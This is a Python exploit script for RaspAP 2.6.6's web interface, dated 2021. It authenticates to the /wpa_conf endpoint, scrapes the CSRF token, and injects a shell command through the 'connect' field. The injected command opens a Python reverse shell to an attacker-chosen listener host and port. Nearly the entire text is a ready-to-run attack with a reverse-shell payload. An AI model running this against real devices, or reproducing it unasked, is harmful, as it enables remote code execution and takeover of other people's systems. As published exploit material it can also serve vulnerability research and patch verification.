# Date: 23.08.2021
# Exploit Author: Moritz Gruber <
# Vendor Homepage: https://raspap.com/
# Software Link: https://github.com/RaspAP/raspap-webgui
# Version: 2.6.6
# Tested on: Linux raspberrypi 5.10.52-v7+
import requests
from requests.api import post
from requests.auth import HTTPBasicAuth
from bs4 import BeautifulSoup
import sys, re
if len(sys.argv) != 7:
print("python3 exec-raspap.py <target-host>
<target-port> <username> <password>
<reverse-host> <reverse-port>")
sys.exit()
else:
target_host = sys.argv[1]
target_port = sys.argv[2]
username = sys.argv[3]
password = sys.argv[4]
listener_host = sys.argv[5]
listener_port = sys.argv[6]
endpoint = "/wpa_conf"
exploit = f"python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{listener_host}\",{listener_port}));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
url =
"http://{}:{}/{}".format(target_host,target_port,endpoint)
s = requests.Session()
get_Request = s.get(url, auth=HTTPBasicAuth(username,
password))
soup = BeautifulSoup(get_Request.text, "lxml")
csrf_token =
soup.find("meta",{"name":"csrf_token"}).get("content")
post_data = {
"csrf_token": csrf_token,
"connect": "wlan; {}".format(exploit)
}
post_Request = s.post(url, data=post_data,
auth=HTTPBasicAuth(username, password))
if post_Request.status_code:
print("Exploit send.")
else:
print("Something went wrong.")
print("Done")
